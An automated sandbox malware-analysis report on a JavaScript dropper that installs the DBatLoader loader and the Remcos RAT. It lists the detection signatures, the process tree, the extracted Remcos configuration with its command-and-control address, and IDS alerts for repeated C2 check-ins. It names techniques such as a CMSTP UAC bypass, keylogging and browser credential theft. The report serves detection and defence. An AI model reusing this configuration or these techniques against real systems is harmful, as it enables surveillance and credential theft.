Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
6732832.js

Overview

General Information

Sample name:6732832.js
Analysis ID:1639312
MD5:f497655b5c7c0834be1fe0ea0eb7493c
SHA1:b8e7608a478d0b50547e758f4a6567823fa3f311
SHA256:53bcd29a7e6afd5ff7e507a36fc47c7696106c54259bd8c10c76ac6716fda0ae
Tags:jsRATRemcosRATuser-abuse_ch
Infos:

Detection

Remcos, DBatLoader
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Benign windows process drops PE files
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected DBatLoader
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Drops PE files with a suspicious file extension
Installs a global keyboard hook
Queues an APC in another process (thread injection)
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Suspicious Creation with Colorcpl
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
JavaScript source code contains large arrays or strings with random content potentially encoding malicious code
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 6628 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\6732832.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • x.exe (PID: 6980 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 56432B42A6DF492A60F9577716132B79)
      • cmd.exe (PID: 5656 cmdline: C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\6770.cmd"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 4108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5984 cmdline: C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\16992.cmd"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • colorcpl.exe (PID: 5516 cmdline: C:\Windows\System32\colorcpl.exe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
  • Ekbmajrx.PIF (PID: 7248 cmdline: "C:\Users\user\Links\Ekbmajrx.PIF" MD5: 56432B42A6DF492A60F9577716132B79)
    • colorcpl.exe (PID: 7308 cmdline: C:\Windows\System32\colorcpl.exe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
  • Ekbmajrx.PIF (PID: 7452 cmdline: "C:\Users\user\Links\Ekbmajrx.PIF" MD5: 56432B42A6DF492A60F9577716132B79)
    • colorcpl.exe (PID: 7504 cmdline: C:\Windows\System32\colorcpl.exe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["196.251.83.79:786:0"], "Assigned name": "HH", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-HRCZR2", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": ""}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000008.00000002.2523747715.0000000032B00000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000008.00000002.2523747715.0000000032AE0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000003.00000002.1255041481.00000000023DF000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
          00000008.00000002.2523747715.0000000032AE8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            00000010.00000002.1343119653.0000000003000000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              Click to see the 44 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              3.2.x.exe.23dfc48.0.raw.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
                16.2.colorcpl.exe.3000000.0.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                  16.2.colorcpl.exe.3000000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                    16.2.colorcpl.exe.3000000.0.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                      16.2.colorcpl.exe.3000000.0.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                      • 0x6d758:$a1: Remcos restarted by watchdog!
                      • 0x6dda8:$a3: %02i:%02i:%02i:%03i
                      Click to see the 39 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
                      Source: File createdAuthor: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 6980, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
                      Sigma detected: Suspicious Creation with Colorcpl
                      Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\colorcpl.exe, ProcessId: 5516, TargetFilename: C:\ProgramData\remcos
                      Sigma detected: WScript or CScript Dropper
                      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\6732832.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\6732832.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 496, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\6732832.js", ProcessId: 6628, ProcessName: wscript.exe
                      Sigma detected: CurrentVersion Autorun Keys Modification
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\\Users\\user\\Links\Ekbmajrx.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 6980, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Ekbmajrx
                      Sigma detected: Execution of Suspicious File Type Extension
                      Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: "C:\Users\user\Links\Ekbmajrx.PIF" , CommandLine: "C:\Users\user\Links\Ekbmajrx.PIF" , CommandLine|base64offset|contains: , Image: C:\Users\user\Links\Ekbmajrx.PIF, NewProcessName: C:\Users\user\Links\Ekbmajrx.PIF, OriginalFileName: C:\Users\user\Links\Ekbmajrx.PIF, ParentCommandLine: , ParentImage: , ParentProcessId: 496, ProcessCommandLine: "C:\Users\user\Links\Ekbmajrx.PIF" , ProcessId: 7248, ProcessName: Ekbmajrx.PIF
                      Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                      Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\6732832.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\6732832.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 496, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\6732832.js", ProcessId: 6628, ProcessName: wscript.exe

                      Stealing of Sensitive Information

                      barindex
                      Sigma detected: Remcos
                      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\colorcpl.exe, ProcessId: 5516, TargetFilename: C:\ProgramData\remcos\logs.dat

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-03-15T09:31:22.521437+010020327761Malware Command and Control Activity Detected192.168.2.649693196.251.83.79786TCP
                      2025-03-15T09:31:25.137339+010020327761Malware Command and Control Activity Detected192.168.2.649696196.251.83.79786TCP
                      2025-03-15T09:31:27.761668+010020327761Malware Command and Control Activity Detected192.168.2.649697196.251.83.79786TCP
                      2025-03-15T09:31:30.406679+010020327761Malware Command and Control Activity Detected192.168.2.649698196.251.83.79786TCP
                      2025-03-15T09:31:33.063665+010020327761Malware Command and Control Activity Detected192.168.2.649699196.251.83.79786TCP
                      2025-03-15T09:31:35.703350+010020327761Malware Command and Control Activity Detected192.168.2.649702196.251.83.79786TCP
                      2025-03-15T09:31:38.345431+010020327761Malware Command and Control Activity Detected192.168.2.649703196.251.83.79786TCP
                      2025-03-15T09:31:40.984604+010020327761Malware Command and Control Activity Detected192.168.2.649704196.251.83.79786TCP
                      2025-03-15T09:31:43.613149+010020327761Malware Command and Control Activity Detected192.168.2.649705196.251.83.79786TCP
                      2025-03-15T09:31:46.269344+010020327761Malware Command and Control Activity Detected192.168.2.649706196.251.83.79786TCP
                      2025-03-15T09:31:48.910089+010020327761Malware Command and Control Activity Detected192.168.2.649707196.251.83.79786TCP
                      2025-03-15T09:31:51.534932+010020327761Malware Command and Control Activity Detected192.168.2.649708196.251.83.79786TCP
                      2025-03-15T09:31:54.176298+010020327761Malware Command and Control Activity Detected192.168.2.649709196.251.83.79786TCP
                      2025-03-15T09:31:56.800273+010020327761Malware Command and Control Activity Detected192.168.2.649710196.251.83.79786TCP
                      2025-03-15T09:31:59.457500+010020327761Malware Command and Control Activity Detected192.168.2.649711196.251.83.79786TCP
                      2025-03-15T09:32:02.097409+010020327761Malware Command and Control Activity Detected192.168.2.649712196.251.83.79786TCP
                      2025-03-15T09:32:04.738636+010020327761Malware Command and Control Activity Detected192.168.2.649713196.251.83.79786TCP
                      2025-03-15T09:32:07.394972+010020327761Malware Command and Control Activity Detected192.168.2.649714196.251.83.79786TCP
                      2025-03-15T09:32:10.020325+010020327761Malware Command and Control Activity Detected192.168.2.649716196.251.83.79786TCP
                      2025-03-15T09:32:12.675501+010020327761Malware Command and Control Activity Detected192.168.2.649718196.251.83.79786TCP
                      2025-03-15T09:32:15.332382+010020327761Malware Command and Control Activity Detected192.168.2.649719196.251.83.79786TCP
                      2025-03-15T09:32:17.957780+010020327761Malware Command and Control Activity Detected192.168.2.649720196.251.83.79786TCP
                      2025-03-15T09:32:20.597598+010020327761Malware Command and Control Activity Detected192.168.2.649721196.251.83.79786TCP
                      2025-03-15T09:32:23.222698+010020327761Malware Command and Control Activity Detected192.168.2.649722196.251.83.79786TCP
                      2025-03-15T09:32:25.847823+010020327761Malware Command and Control Activity Detected192.168.2.649723196.251.83.79786TCP
                      2025-03-15T09:32:28.506777+010020327761Malware Command and Control Activity Detected192.168.2.649724196.251.83.79786TCP
                      2025-03-15T09:32:31.144340+010020327761Malware Command and Control Activity Detected192.168.2.649725196.251.83.79786TCP
                      2025-03-15T09:32:33.772652+010020327761Malware Command and Control Activity Detected192.168.2.649726196.251.83.79786TCP
                      2025-03-15T09:32:36.409860+010020327761Malware Command and Control Activity Detected192.168.2.649728196.251.83.79786TCP
                      2025-03-15T09:32:39.035951+010020327761Malware Command and Control Activity Detected192.168.2.649729196.251.83.79786TCP
                      2025-03-15T09:32:41.910893+010020327761Malware Command and Control Activity Detected192.168.2.649730196.251.83.79786TCP
                      2025-03-15T09:32:44.571145+010020327761Malware Command and Control Activity Detected192.168.2.649731196.251.83.79786TCP
                      2025-03-15T09:32:47.223569+010020327761Malware Command and Control Activity Detected192.168.2.649732196.251.83.79786TCP
                      2025-03-15T09:32:49.816417+010020327761Malware Command and Control Activity Detected192.168.2.649733196.251.83.79786TCP
                      2025-03-15T09:32:52.384069+010020327761Malware Command and Control Activity Detected192.168.2.649734196.251.83.79786TCP
                      2025-03-15T09:32:54.943020+010020327761Malware Command and Control Activity Detected192.168.2.649735196.251.83.79786TCP
                      2025-03-15T09:32:57.458364+010020327761Malware Command and Control Activity Detected192.168.2.649736196.251.83.79786TCP
                      2025-03-15T09:32:59.941581+010020327761Malware Command and Control Activity Detected192.168.2.649737196.251.83.79786TCP
                      2025-03-15T09:33:02.394133+010020327761Malware Command and Control Activity Detected192.168.2.649738196.251.83.79786TCP
                      2025-03-15T09:33:04.847377+010020327761Malware Command and Control Activity Detected192.168.2.649739196.251.83.79786TCP
                      2025-03-15T09:33:07.274195+010020327761Malware Command and Control Activity Detected192.168.2.649740196.251.83.79786TCP
                      2025-03-15T09:33:09.662705+010020327761Malware Command and Control Activity Detected192.168.2.649741196.251.83.79786TCP
                      2025-03-15T09:33:12.007178+010020327761Malware Command and Control Activity Detected192.168.2.649742196.251.83.79786TCP
                      2025-03-15T09:33:14.347337+010020327761Malware Command and Control Activity Detected192.168.2.649743196.251.83.79786TCP
                      2025-03-15T09:33:16.644300+010020327761Malware Command and Control Activity Detected192.168.2.649744196.251.83.79786TCP
                      2025-03-15T09:33:18.925743+010020327761Malware Command and Control Activity Detected192.168.2.649745196.251.83.79786TCP
                      2025-03-15T09:33:21.191058+010020327761Malware Command and Control Activity Detected192.168.2.649746196.251.83.79786TCP
                      2025-03-15T09:33:23.441247+010020327761Malware Command and Control Activity Detected192.168.2.649747196.251.83.79786TCP
                      2025-03-15T09:33:25.661455+010020327761Malware Command and Control Activity Detected192.168.2.649748196.251.83.79786TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus / Scanner detection for submitted sample
                      Source: 6732832.jsAvira: detected
                      Antivirus detection for dropped file
                      Source: C:\Users\user\Links\Ekbmajrx.PIFAvira: detection malicious, Label: TR/AD.Remcos.lpmfw
                      Source: C:\Users\user\AppData\Local\Temp\x.exeAvira: detection malicious, Label: TR/AD.Remcos.lpmfw
                      Found malware configuration
                      Source: 8.2.colorcpl.exe.2e00000.0.unpackMalware Configuration Extractor: Remcos {"Host:Port:Password": ["196.251.83.79:786:0"], "Assigned name": "HH", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-HRCZR2", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": ""}
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Local\Temp\x.exeReversingLabs: Detection: 75%
                      Source: C:\Users\user\AppData\Local\Temp\x.exeVirustotal: Detection: 39%Perma Link
                      Source: C:\Users\user\Links\Ekbmajrx.PIFReversingLabs: Detection: 75%
                      Source: C:\Users\user\Links\Ekbmajrx.PIFVirustotal: Detection: 39%Perma Link
                      Multi AV Scanner detection for submitted file
                      Source: 6732832.jsVirustotal: Detection: 47%Perma Link
                      Source: 6732832.jsReversingLabs: Detection: 41%
                      Yara detected Remcos RAT
                      Source: Yara matchFile source: 16.2.colorcpl.exe.3000000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.colorcpl.exe.2e00000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.colorcpl.exe.3000000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.colorcpl.exe.2e00000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.colorcpl.exe.2bd0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.colorcpl.exe.2bd0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.x.exe.28f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000002.2523747715.0000000032B00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2523747715.0000000032AE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2523747715.0000000032AE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.1343119653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2523856221.00000000344BF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1269621108.000000007E4F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1255776445.0000000002925000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.1422872475.0000000002BD0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2501429735.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.1376834668.0000000030700000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.1422766132.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: x.exe PID: 6980, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 5516, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 7308, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 7504, type: MEMORYSTR
                      Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E33B64 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,8_2_02E33B64
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_03033B64 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,16_2_03033B64
                      Source: x.exeBinary or memory string: -----BEGIN PUBLIC KEY-----

                      Exploits

                      barindex
                      Yara detected UAC Bypass using CMSTP
                      Source: Yara matchFile source: 16.2.colorcpl.exe.3000000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.colorcpl.exe.2e00000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.colorcpl.exe.3000000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.colorcpl.exe.2e00000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.colorcpl.exe.2bd0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.colorcpl.exe.2bd0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.x.exe.28f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000010.00000002.1343119653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1269621108.000000007E4F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1255776445.0000000002925000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.1422872475.0000000002BD0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2501429735.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: x.exe PID: 6980, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 5516, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 7308, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 7504, type: MEMORYSTR

                      Privilege Escalation

                      barindex
                      Contains functionality to bypass UAC (CMSTPLUA)
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E06ABC _wcslen,CoGetObject,8_2_02E06ABC
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_03006ABC _wcslen,CoGetObject,16_2_03006ABC
                      Source: Binary string: easinvoker.pdb source: x.exe, 00000003.00000003.1234992961.000000007ED63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1267818979.00000000205DE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1234132581.000000007EA0F000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1267818979.0000000020647000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1234992961.000000007ED50000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdbGCTL source: x.exe, 00000003.00000003.1234992961.000000007ED63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1237071641.0000000000979000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000002.1267818979.00000000205DE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1237071641.000000000094A000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000003.1234132581.000000007EA0F000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1267818979.0000000020647000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1234992961.000000007ED50000.00000004.00001000.00020000.00000000.sdmp
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_028F52F8 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,3_2_028F52F8
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E090DC __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,8_2_02E090DC
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E0B6B5 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,8_2_02E0B6B5
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E1C7E5 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,8_2_02E1C7E5
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E0B8BA FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,8_2_02E0B8BA
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E4E989 FindFirstFileExA,8_2_02E4E989
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E07EDD __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,8_2_02E07EDD
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E06F13 FindFirstFileW,FindNextFileW,8_2_02E06F13
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E19CEE FindFirstFileW,FindNextFileW,FindNextFileW,8_2_02E19CEE
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E08CDE __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,8_2_02E08CDE
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_030090DC __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,16_2_030090DC
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0301C7E5 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,16_2_0301C7E5
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0300B6B5 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,16_2_0300B6B5
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0304E989 FindFirstFileExA,16_2_0304E989
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0300B8BA FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,16_2_0300B8BA
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_03006F13 FindFirstFileW,FindNextFileW,16_2_03006F13
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_03007EDD __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,16_2_03007EDD
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_03008CDE __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,16_2_03008CDE
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_03019CEE FindFirstFileW,FindNextFileW,FindNextFileW,16_2_03019CEE
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E07357 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,8_2_02E07357

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49705 -> 196.251.83.79:786
                      Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49716 -> 196.251.83.79:786
                      Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49735 -> 196.251.83.79:786
